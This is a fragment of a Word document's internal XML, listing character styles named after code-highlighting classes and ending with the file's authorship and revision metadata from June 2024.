  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-tag">
    <w:name w:val="hljs-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-name">
    <w:name w:val="hljs-name"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attr">
    <w:name w:val="hljs-attr"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059C7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="javascript">
    <w:name w:val="javascript"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B059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954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3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54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0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9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4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716</Words>
  <Characters>4086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 Белютий</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Назар Белютий</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-27T15:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>